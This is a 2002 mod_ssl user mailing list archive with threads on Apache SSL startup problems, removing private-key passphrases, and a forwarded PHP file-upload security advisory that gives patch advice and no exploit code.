------_=_NextPart_001_01C1BFC5.CFE023C0-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Feb 27 20:53:17 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id UAA25542; Wed, 27 Feb 2002 20:51:04 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from sifl.squaretrade.com id UAA25401; Wed, 27 Feb 2002 20:49:37 +0100 (MET) Received: from olly.squaretrade.com ([216.136.185.66] helo=gonzo) by sifl.squaretrade.com with smtp (Exim 3.34 #1 (Debian)) id 16g9RU-000088-01; Wed, 27 Feb 2002 11:08:44 -0800 From: "Glen S Mehn" To: , Subject: =?iso-8859-1?Q?RE:_R=E9f._:_Re:_httpd_doesn't_start_with_own_certificate?= Date: Wed, 27 Feb 2002 11:31:59 -0800 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 8bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 In-Reply-To: Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Glen S Mehn" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users is it listening on port 443? server# netstat -a | grep 443 netstat -a | grep https are you using `apachectl startssl` ps -ef/-waux | grep http should show something like: /usr/local/apache/bin/httpd -DSSL if you don't see the -DSSL, then you're not running with ssl on. -g -----Original Message----- From: owner-modssl-users@modssl.org [mailto:owner-modssl-users@modssl.org]On Behalf Of Arnaud De Timmerman Sent: Wednesday, February 27, 2002 04:39 AM To: anand@vandemataram.com Cc: modssl-users@modssl.org Subject: Réf. : Re: httpd doesn't start with own certificate Hi, >r u using the same server key with generated certificate? also test the path where you placed (regenerated) certificate. i use the new i've created for the new certificate, and the path is correct in the httpd.conf do i have to give specials access to these both files ? 400 ? 644 ? something else ? i there a way to know why the server doesn't start ? do i have to add something in the httpd.conf ? thanks ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Feb 27 20:53:23 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id UAA25623; Wed, 27 Feb 2002 20:51:56 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from sifl.squaretrade.com id UAA25391; Wed, 27 Feb 2002 20:49:34 +0100 (MET) Received: from olly.squaretrade.com ([216.136.185.66] helo=gonzo) by sifl.squaretrade.com with smtp (Exim 3.34 #1 (Debian)) id 16g9iV-0000Hp-01 for ; Wed, 27 Feb 2002 11:26:19 -0800 From: "Glen S Mehn" To: Subject: RE: csr password Date: Wed, 27 Feb 2002 11:49:34 -0800 Message-ID: MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_023C_01C1BF84.D35536D0" X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 In-Reply-To: Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Glen S Mehn" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users This is a multi-part message in MIME format. ------=_NextPart_000_023C_01C1BF84.D35536D0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit csr passwordfrom openssl.org: To remove the pass phrase on an RSA private key: openssl rsa -in key.pem -out keyout.pem read the full openssl rsa man page here: http://www.openssl.org/docs/apps/rsa.html note that it's the KEY that has a passphrase on it, not the csr. And you've gotta be super careful with the box, as anyone could use your passphrase... glen -----Original Message----- From: owner-modssl-users@modssl.org [mailto:owner-modssl-users@modssl.org]On Behalf Of Henning Sittler Sent: Wednesday, February 27, 2002 11:35 AM To: 'modssl-users@modssl.org' Subject: csr password I setup a secure server with a password on the csr that must be entered when apache starts up. How can I remove this password so that apache can start without asking for it? Do I need to generate a new key pair? If I do, will that invalidate my current issued certificate? Thanks, Henning Sittler www.inscriber.com ------=_NextPart_000_023C_01C1BF84.D35536D0 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable csr password
from=20 openssl.org:
 

To remove the pass phrase on an RSA private key: 

 openssl =
rsa -in key.pem -out keyout.pem

read the full openssl rsa man page here:
http://www.openssl.org=
/docs/apps/rsa.html
note that it's the KEY that has a =
passphrase on it, not the csr. 
And you've gotta be super =
careful with the box, as anyone could use your =
passphrase...
 
glen
 
-----Original Message-----
From:=20 owner-modssl-users@modssl.org = [mailto:owner-modssl-users@modssl.org]On=20 Behalf Of Henning Sittler
Sent: Wednesday, February 27, = 2002=20 11:35 AM
To: 'modssl-users@modssl.org'
Subject: = csr=20 password

I setup a secure server with a password on the csr = that must=20 be entered when apache starts up.  How can I remove this password = so that=20 apache can start without asking for it?

Do I need to generate a new key pair?  If I do, = will that=20 invalidate my current issued certificate?

Thanks,



Henning Sittler
www.inscriber.com

------=_NextPart_000_023C_01C1BF84.D35536D0-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Feb 27 20:57:16 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id UAA26063; Wed, 27 Feb 2002 20:56:54 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from gmk-smtp4.growmark.com id UAA25930; Wed, 27 Feb 2002 20:55:25 +0100 (MET) Received: FROM exchange-gmk.growmark2.com BY gmk-smtp4.growmark.com ; Wed Feb 27 13:55:07 2002 -0600 Received: by webmail.growmark2.com with Internet Mail Service (5.5.2653.19) id ; Wed, 27 Feb 2002 13:55:17 -0600 Message-ID: From: "Price, Gary" To: "'modssl-users@modssl.org'" Subject: RE: csr password Date: Wed, 27 Feb 2002 13:55:05 -0600 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) Content-Type: multipart/alternative; boundary="----_=_NextPart_001_01C1BFC8.A6EDC7D0" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Price, Gary" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users This message is in MIME format. Since your mail reader does not understand this format, some or all of this message may not be legible. ------_=_NextPart_001_01C1BFC8.A6EDC7D0 Content-Type: text/plain; charset="iso-8859-1" Use the SSLPassPhraseDialog option. For example in httpd.conf put the following. SSLPassPhraseDialog exec:/path to script/script_name The script should look like this, all it needs to do is echo the password back. _________________________________________ #!/bin/ksh # A few comments echo Your_Password _________________________________________ -----Original Message----- From: Henning Sittler [mailto:Henning@inscriber.com] Sent: Wednesday, February 27, 2002 1:35 PM To: 'modssl-users@modssl.org' Subject: csr password I setup a secure server with a password on the csr that must be entered when apache starts up. How can I remove this password so that apache can start without asking for it? Do I need to generate a new key pair? If I do, will that invalidate my current issued certificate? Thanks, Henning Sittler www.inscriber.com ------_=_NextPart_001_01C1BFC8.A6EDC7D0 Content-Type: text/html; charset="iso-8859-1" csr password
Use the SSLPassPhraseDialog option. For example in httpd.conf put the following.
 
SSLPassPhraseDialog exec:/path to script/script_name
 
The script should look like this, all it needs to do is echo the password back.
_________________________________________
#!/bin/ksh
# A few comments
echo Your_Password
_________________________________________
 
 
-----Original Message-----
From: Henning Sittler [mailto:Henning@inscriber.com]
Sent: Wednesday, February 27, 2002 1:35 PM
To: 'modssl-users@modssl.org'
Subject: csr password

I setup a secure server with a password on the csr that must be entered when apache starts up.  How can I remove this password so that apache can start without asking for it?

Do I need to generate a new key pair?  If I do, will that invalidate my current issued certificate?

Thanks,



Henning Sittler
www.inscriber.com

------_=_NextPart_001_01C1BFC8.A6EDC7D0-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Feb 27 21:22:12 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id VAA27684; Wed, 27 Feb 2002 21:16:11 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mail.inorth.com id VAA27517; Wed, 27 Feb 2002 21:14:31 +0100 (MET) Received: by mail.inorth.com with Internet Mail Service (5.5.2653.19) id ; Wed, 27 Feb 2002 15:14:29 -0500 Message-ID: From: Henning Sittler To: "'modssl-users@modssl.org'" Subject: FW: csr password Date: Wed, 27 Feb 2002 15:14:28 -0500 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) Content-Type: multipart/alternative; boundary="----_=_NextPart_001_01C1BFCB.5BF5DB70" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Henning Sittler X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users This message is in MIME format. Since your mail reader does not understand this format, some or all of this message may not be legible. ------_=_NextPart_001_01C1BFCB.5BF5DB70 Content-Type: text/plain; charset="iso-8859-1" Ok, I found the HOWTO (from a link in the mail list archives): http://www.modssl.org/docs/2.3/ssl_faq.html#ToC25 But when I try this, I get: read RSA key Enter PEM pass phrase: unable to load key 29484:error:06065064:digital envelope routines:EVP_DecryptFinal:bad decrypt:evp_enc.c:277: 29484:error:0906A065:PEM routines:PEM_do_header:bad decrypt:pem_lib.c:451: curious. Henning Sittler www.inscriber.com -----Original Message----- From: Henning Sittler Sent: Wednesday, February 27, 2002 2:35 PM To: 'modssl-users@modssl.org' Subject: csr password I setup a secure server with a password on the csr that must be entered when apache starts up. How can I remove this password so that apache can start without asking for it? Do I need to generate a new key pair? If I do, will that invalidate my current issued certificate? Thanks, Henning Sittler www.inscriber.com ------_=_NextPart_001_01C1BFCB.5BF5DB70 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable FW: csr password

Ok, I found the HOWTO (from a link in the mail list = archives):
http://www.modssl.org/docs/2.3/ssl_faq.html#ToC25<= /FONT>

But when I try this, I get:
read RSA key
Enter PEM pass phrase:
unable to load key
29484:error:06065064:digital envelope = routines:EVP_DecryptFinal:bad decrypt:evp_enc.c:277:
29484:error:0906A065:PEM routines:PEM_do_header:bad = decrypt:pem_lib.c:451:

curious.


Henning Sittler
www.inscriber.com



-----Original Message-----
From: Henning Sittler
Sent: Wednesday, February 27, 2002 2:35 PM
To: 'modssl-users@modssl.org'
Subject: csr password


I setup a secure server with a password on the csr = that must be entered when apache starts up.  How can I remove this = password so that apache can start without asking for it?

Do I need to generate a new key pair?  If I do, = will that invalidate my current issued certificate?

Thanks,



Henning Sittler
www.inscriber.com

------_=_NextPart_001_01C1BFCB.5BF5DB70-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Feb 28 01:44:37 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id BAA21730; Thu, 28 Feb 2002 01:42:27 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from darkstar.sysinfo.com id BAA21383; Thu, 28 Feb 2002 01:39:32 +0100 (MET) Received: from localhost (dufresne@localhost) by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id TAA22226 for ; Wed, 27 Feb 2002 19:27:38 -0500 Date: Wed, 27 Feb 2002 19:27:38 -0500 (EST) From: "R. DuFresne" To: modssl-users@modssl.org Subject: Advisory 012002: PHP remote vulnerabilities (fwd) Message-ID: Organization: sysinfo.com X-Subliminal: If at first you don't suck seed... X-Admonition: The Good thing about potential is X-Admonition2: as long as you do nothing X-Admonition3: you'll always have it. MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "R. DuFresne" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Considering the plethroa of php users on the list, and the fact many are perhaps not reading bugtraq: ---------- Forwarded message ---------- From: security@e-matters.de Subject: Advisory 012002: PHP remote vulnerabilities Date: Wed, 27 Feb 2002 12:30:56 +0100 To: bugtraq@securityfocus.com, vulnwatch@vulnwatch.org e-matters GmbH www.e-matters.de -= Security Advisory =- Advisory: Multiple Remote Vulnerabilites within PHP's fileupload code Release Date: 2002/02/27 Last Modified: 2002/02/27 Author: Stefan Esser [s.esser@e-matters.de] Application: PHP v3.10-v3.18, v4.0.1-v4.1.1 Severity: Several vulnerabilities in PHP's fileupload code allow remote compromise Risk: Critical Vendor Status: Patches Released Reference: http://security.e-matters.de/advisories/012002.html Overview: We found several flaws in the way PHP handles multipart/form-data POST requests. Each of the flaws could allow an attacker to execute arbitrary code on the victim's system. Details: PHP supports multipart/form-data POST requests (as described in RFC1867) known as POST fileuploads. Unfourtunately there are several flaws in the php_mime_split function that could be used by an attacker to execute arbitrary code. During our research we found out that not only PHP4 but also older versions from the PHP3 tree are vulnerable. The following is a list of bugs we found: PHP 3.10-3.18 - broken boundary check (hard to exploit) - arbitrary heap overflow (easy exploitable) PHP 4.0.1-4.0.3pl1 - broken boundary check (hard to exploit) - heap off by one (easy exploitable) PHP 4.0.2-4.0.5 - 2 broken boundary checks (one very easy and one hard to exploit) PHP 4.0.6-4.0.7RC2 - broken boundary check (very easy to exploit) PHP 4.0.7RC3-4.1.1 - broken boundary check (hard to exploit) Finally I want to mention that most of these vulnerabilities are exploitable only on linux or solaris. But the heap off by one is only exploitable on x86 architecture and the arbitrary heap overflow in PHP3 is exploitable on most OS and architectures. (This includes *BSD) Users running PHP 4.2.0-dev from cvs are not vulnerable to any of the described bugs because the fileupload code was completly rewritten for the 4.2.0 branch. Proof of Concept: e-matters is not going to release exploits for any of the discovered vulnerabilities to the public. Vendor Response: Because I am part of the php developer team there is not much I can write here... 27th February 2002 - An updated version of php and the patch for these vulnerabilities are now available at: http://www.php.net/downloads.php Recommendation: If you are running PHP 4.0.3 or above one way to workaround these bugs is to disable the fileupload support within your php.ini (file_uploads = Off) If you are running php as module keep in mind to restart the webserver. Anyway you should better install the fixed or a properly patched version to be safe. Sidenotice: This advisory is so short because I don't want to give out more info than is needed. Users running the developer version of php (4.2.0-dev) are not vulnerable to these bugs because the fileupload support was completly rewritten for that branch. GPG-Key: http://security.e-matters.de/gpg_key.asc pub 1024D/75E7AAD6 2002-02-26 e-matters GmbH - Securityteam Key fingerprint = 43DD 843C FAB9 832A E5AB CAEB 81F2 8110 75E7 AAD6 Copyright 2002 Stefan Esser. All rights reserved. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Feb 28 07:42:20 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id HAA23657; Thu, 28 Feb 2002 07:42:08 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from sttlpop5.sttl.uswest.net id HAA23574; Thu, 28 Feb 2002 07:41:12 +0100 (MET) Received: (qmail 25612 invoked by alias); 28 Feb 2002 01:14:28 -0000 Delivered-To: fixup-modssl-users@modssl.org@fixme Received: (qmail 25584 invoked by uid 0); 28 Feb 2002 01:14:27 -0000 Received: from sttldslgw34poolb4.sttl.uswest.net (HELO wmtiabertj) (65.102.185.4) by sttlpop5.sttl.uswest.net with SMTP; 28 Feb 2002 01:14:27 -0000 From: "SoilentG" To: Subject: RE: Advisory 012002: PHP remote vulnerabilities (fwd) Date: Wed, 27 Feb 2002 17:17:28 -0800 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4807.1700 Importance: Normal In-Reply-To: Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "SoilentG" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Thanks. One note. I use php 4.0.6 and I had to set file_uploads = 0 in order for it to take the value, setting it to "Off" showed "no value" in phpinfo(); Jeff > -----Original Message----- > From: owner-modssl-users@modssl.org > [mailto:owner-modssl-users@modssl.org]On Behalf Of R. DuFresne > Sent: Wednesday, February 27, 2002 4:28 PM > To: modssl-users@modssl.org > Subject: Advisory 012002: PHP remote vulnerabilities (fwd) > > > > Considering the plethroa of php users on the list, and the fact many are > perhaps not reading bugtraq: > > ---------- Forwarded message ---------- > From: security@e-matters.de > Subject: Advisory 012002: PHP remote vulnerabilities > Date: Wed, 27 Feb 2002 12:30:56 +0100 > To: bugtraq@securityfocus.com, vulnwatch@vulnwatch.org > > e-matters GmbH > www.e-matters.de > > -= Security Advisory =- > > > > Advisory: Multiple Remote Vulnerabilites within PHP's fileupload code > Release Date: 2002/02/27 > Last Modified: 2002/02/27 > Author: Stefan Esser [s.esser@e-matters.de] > > Application: PHP v3.10-v3.18, v4.0.1-v4.1.1 > Severity: Several vulnerabilities in PHP's fileupload code allow > remote compromise > Risk: Critical > Vendor Status: Patches Released > Reference: http://security.e-matters.de/advisories/012002.html > > > > Overview: > > We found several flaws in the way PHP handles multipart/form-data POST > requests. Each of the flaws could allow an attacker to execute > arbitrary > code on the victim's system. > > > Details: > > PHP supports multipart/form-data POST requests (as described > in RFC1867) > known as POST fileuploads. Unfourtunately there are several > flaws in the > php_mime_split function that could be used by an attacker to execute > arbitrary code. During our research we found out that not only PHP4 but > also older versions from the PHP3 tree are vulnerable. > > > The following is a list of bugs we found: > > PHP 3.10-3.18 > > - broken boundary check (hard to exploit) > - arbitrary heap overflow (easy exploitable) > > PHP 4.0.1-4.0.3pl1 > > - broken boundary check (hard to exploit) > - heap off by one (easy exploitable) > > PHP 4.0.2-4.0.5 > > - 2 broken boundary checks (one very easy and one hard to exploit) > > PHP 4.0.6-4.0.7RC2 > > - broken boundary check (very easy to exploit) > > PHP 4.0.7RC3-4.1.1 > > - broken boundary check (hard to exploit) > > > Finally I want to mention that most of these vulnerabilities are > exploitable only on linux or solaris. But the heap off by one is only > exploitable on x86 architecture and the arbitrary heap overflow in > PHP3 is exploitable on most OS and architectures. (This includes *BSD) > > Users running PHP 4.2.0-dev from cvs are not vulnerable to any of the > described bugs because the fileupload code was completly rewritten for > the 4.2.0 branch. > > > Proof of Concept: > > e-matters is not going to release exploits for any of the discovered > vulnerabilities to the public. > > > Vendor Response: > > Because I am part of the php developer team there is not much I can > write here... > > 27th February 2002 - An updated version of php and the patch for > these vulnerabilities are now available at: > http://www.php.net/downloads.php > > > Recommendation: > > If you are running PHP 4.0.3 or above one way to workaround these > bugs is to disable the fileupload support within your php.ini > (file_uploads = Off) If you are running php as module keep in mind > to restart the webserver. Anyway you should better install the > fixed or a properly patched version to be safe. > > > Sidenotice: > > This advisory is so short because I don't want to give out more info > than is needed. > > Users running the developer version of php (4.2.0-dev) are not > vulnerable to these bugs because the fileupload support was completly > rewritten for that branch. > > > GPG-Key: > > http://security.e-matters.de/gpg_key.asc > > pub 1024D/75E7AAD6 2002-02-26 e-matters GmbH - Securityteam > Key fingerprint = 43DD 843C FAB9 832A E5AB CAEB 81F2 8110 75E7 AAD6 > > > Copyright 2002 Stefan Esser. All rights reserved. > > > > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org > ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Feb 28 08:49:17 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id IAA01144; Thu, 28 Feb 2002 08:49:01 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from cer31mx.cirso.fr id IAA00945; Thu, 28 Feb 2002 08:47:16 +0100 (MET) Received: from cer31mx.cirso.fr (localhost [127.0.0.1]) by cer31mx.cirso.fr (8.11.1/8.11.1) with ESMTP id g1S7lhm03582 for ; Thu, 28 Feb 2002 08:47:43 +0100 Received: from contact31.cirso.fr (contact.cirso.fr [213.41.82.11]) by cer31mx.cirso.fr (8.11.1/8.11.1) with SMTP id g1S7lg003548; Thu, 28 Feb 2002 08:47:42 +0100 Received: by contact31.cirso.fr(Lotus SMTP MTA v4.6.7 (934.1 12-30-1999)) id C1256B6E.002ACD0F ; Thu, 28 Feb 2002 08:47:30 +0100 X-Lotus-FromDomain: CER59@CER31@URSSAF From: "Arnaud De Timmerman" To: glen@squaretrade.com cc: modssl-users@modssl.org Message-ID: Date: Thu, 28 Feb 2002 08:42:40 +0100 Subject: =?iso-8859-1?Q?R=E9f._:_RE:_R=E9f._:_Re:_httpd_doesn't_start_with?= =?iso-8859-1?Q?_own_certificate?= Mime-Version: 1.0 Content-type: text/plain; charset=us-ascii Content-Disposition: inline Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Arnaud De Timmerman" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users glen, >is it listening on port 443? >server# netstat -a | grep 443 netstat -a | grep https netstat -a | grep https gives : ********* tcp 0 0 *:https *:* LISTEN ********* >are you using `apachectl startssl` no to start the server, i use "httpd start" (or "httpd restart") i'm using RH6.2 >ps -ef/-waux | grep http this command has an unsupported option here ps -ef | grep http gives : ********* root 8783 1 0 Feb27 ? 00:00:00 httpd nobody 8786 8783 0 Feb27 ? 00:00:00 httpd nobody 8787 8783 0 Feb27 ? 00:00:00 httpd nobody 8788 8783 0 Feb27 ? 00:00:00 httpd nobody 8789 8783 0 Feb27 ? 00:00:00 httpd nobody 8790 8783 0 Feb27 ? 00:00:00 httpd nobody 8791 8783 0 Feb27 ? 00:00:00 httpd ********* i'm trying to create a certificate (and key file) as close as possible from the ./ssl.crt/server.crt and ./ssl.key/server.key files but still don't know why the server doesn't accept them and gladly accept server.crt and server.key glen i could send "my" both files privately if you wish thanks for your help ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Feb 28 09:38:13 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id JAA06210; Thu, 28 Feb 2002 09:38:11 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from cer31mx.cirso.fr id JAA06096; Thu, 28 Feb 2002 09:36:52 +0100 (MET) Received: from cer31mx.cirso.fr (localhost [127.0.0.1]) by cer31mx.cirso.fr (8.11.1/8.11.1) with ESMTP id g1S8bTm07575 for ; Thu, 28 Feb 2002 09:37:29 +0100 Received: from contact31.cirso.fr (contact.cirso.fr [213.41.82.11]) by cer31mx.cirso.fr (8.11.1/8.11.1) with SMTP id g1S8bT007562 for ; Thu, 28 Feb 2002 09:37:29 +0100 Received: by contact31.cirso.fr(Lotus SMTP MTA v4.6.7 (934.1 12-30-1999)) id C1256B6E.002F5EB4 ; Thu, 28 Feb 2002 09:37:24 +0100 X-Lotus-FromDomain: CER59@CER31@URSSAF From: "Arnaud De Timmerman" To: modssl-users@modssl.org Message-ID: Date: Thu, 28 Feb 2002 09:37:06 +0100 Subject: =?iso-8859-1?Q?R=E9f._:_RE:_R=E9f._:_Re:_httpd_doesn't_start_with?= =?iso-8859-1?Q?_own_certificate?= Mime-Version: 1.0 Content-type: text/plain; charset=us-ascii Content-Disposition: inline Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Arnaud De Timmerman" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users hi, i've found what my problem was : the ./ssl.key/server.key demo file ISN'T protected with a password, my key was i'll have a look in the docs now to find how to start the server if the private key is protected with a password i can't imagine the key hasn't to be protected for the server to start thanks all ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Feb 28 10:53:59 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id KAA13470; Thu, 28 Feb 2002 10:53:04 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id KAA13320; Thu, 28 Feb 2002 10:51:10 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 88E454CE6E2; Thu, 28 Feb 2002 10:32:12 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g1S9Upi17526; Thu, 28 Feb 2002 10:30:51 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from ureach.com id VAA27729; Wed, 27 Feb 2002 21:16:38 +0100 (MET) Received: from www21.ureach.com (www21.ureach.com [172.16.2.49]) by ureach.com (8.9.1/8.8.5) with ESMTP id PAA32275 for ; Wed, 27 Feb 2002 15:16:37 -0500 Received: (from nobody@localhost) by www21.ureach.com (8.9.3/8.9.1) id PAA23353; Wed, 27 Feb 2002 15:16:37 -0500 Date: Wed, 27 Feb 2002 15:16:37 -0500 Message-Id: <200202272016.PAA23353@www21.ureach.com> To: modssl-users@modssl.org From: Eric Webber Subject: SSL works from localhost but not elsewhere Mime-Version: 1.0 Content-Type: multipart/mixed; boundary="_uReach_com_1804289383101484099723349xxx_" X-vsuite-type: e Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Eric Webber X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users --_uReach_com_1804289383101484099723349xxx_ Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit When I go to the url https://localhost using netscape on the same box running apache and mod_ssl, SSL appears to work fine. But when I come in from a box other than the box running apache and mod_ssl, I get Page cannot be displayed. I have apache 1.3.20 RedHat, OpenSSL version 0.9.6b, on redhat version 2.4.7-10. Is this because of the Servername ? I am at a loss and cannot find the solution in the mod_ssl documentation. Is there a set of tests to help ferret out this problem ? warmest regards, Eric Sean Webber here is a copy of my httpd.conf as a file attachment ________________________________________________ Get your own "800" number Voicemail, fax, email, and a lot more http://www.ureach.com/reg/tag --_uReach_com_1804289383101484099723349xxx_ Content-Type: application/octet-stream Content-Disposition: attachment; filename="httpd.conf" Content-Transfer-Encoding: base64 IwojIEJhc2VkIHVwb24gdGhlIE5DU0Egc2VydmVy IGNvbmZpZ3VyYXRpb24gZmlsZXMgb3JpZ2luYWxseSBieSBSb2IgTWNDb29sLgojCiMgVGhpcyBp cyB0aGUgbWFpbiBBcGFjaGUgc2VydmVyIGNvbmZpZ3VyYXRpb24gZmlsZS4gIEl0IGNvbnRhaW5z IHRoZQojIGNvbmZpZ3VyYXRpb24gZGlyZWN0aXZlcyB0aGF0IGdpdmUgdGhlIHNlcnZlciBpdHMg aW5zdHJ1Y3Rpb25zLgojIFNlZSA8VVJMOmh0dHA6Ly93d3cuYXBhY2hlLm9yZy9kb2NzLz4gZm9y IGRldGFpbGVkIGluZm9ybWF0aW9uIGFib3V0CiMgdGhlIGRpcmVjdGl2ZXMuCiMKIyBEbyBOT1Qg c2ltcGx5IHJlYWQgdGhlIGluc3RydWN0aW9ucyBpbiBoZXJlIHdpdGhvdXQgdW5kZXJzdGFuZGlu ZwojIHdoYXQgdGhleSBkby4gIFRoZXkncmUgaGVyZSBvbmx5IGFzIGhpbnRzIG9yIHJlbWluZGVy cy4gIElmIHlvdSBhcmUgdW5zdXJlCiMgY29uc3VsdCB0aGUgb25saW5lIGRvY3MuIFlvdSBoYXZl IGJlZW4gd2FybmVkLiAgCiMKIyBBZnRlciB0aGlzIGZpbGUgaXMgcHJvY2Vzc2VkLCB0aGUgc2Vy dmVyIHdpbGwgbG9vayBmb3IgYW5kIHByb2Nlc3MKIyAvZXRjL2h0dHBkL2NvbmYvc3JtLmNvbmYg YW5kIHRoZW4gL2V0Yy9odHRwZC9jb25mL2FjY2Vzcy5jb25mCiMgdW5sZXNzIHlvdSBoYXZlIG92 ZXJyaWRkZW4gdGhlc2Ugd2l0aCBSZXNvdXJjZUNvbmZpZyBhbmQvb3IKIyBBY2Nlc3NDb25maWcg ZGlyZWN0aXZlcyBoZXJlLgojCiMgVGhlIGNvbmZpZ3VyYXRpb24gZGlyZWN0aXZlcyBhcmUgZ3Jv dXBlZCBpbnRvIHRocmVlIGJhc2ljIHNlY3Rpb25zOgojICAxLiBEaXJlY3RpdmVzIHRoYXQgY29u dHJvbCB0aGUgb3BlcmF0aW9uIG9mIHRoZSBBcGFjaGUgc2VydmVyIHByb2Nlc3MgYXMgYQojICAg ICB3aG9sZSAodGhlICdnbG9iYWwgZW52aXJvbm1lbnQnKS4KIyAgMi4gRGlyZWN0aXZlcyB0aGF0 IGRlZmluZSB0aGUgcGFyYW1ldGVycyBvZiB0aGUgJ21haW4nIG9yICdkZWZhdWx0JyBzZXJ2ZXIs 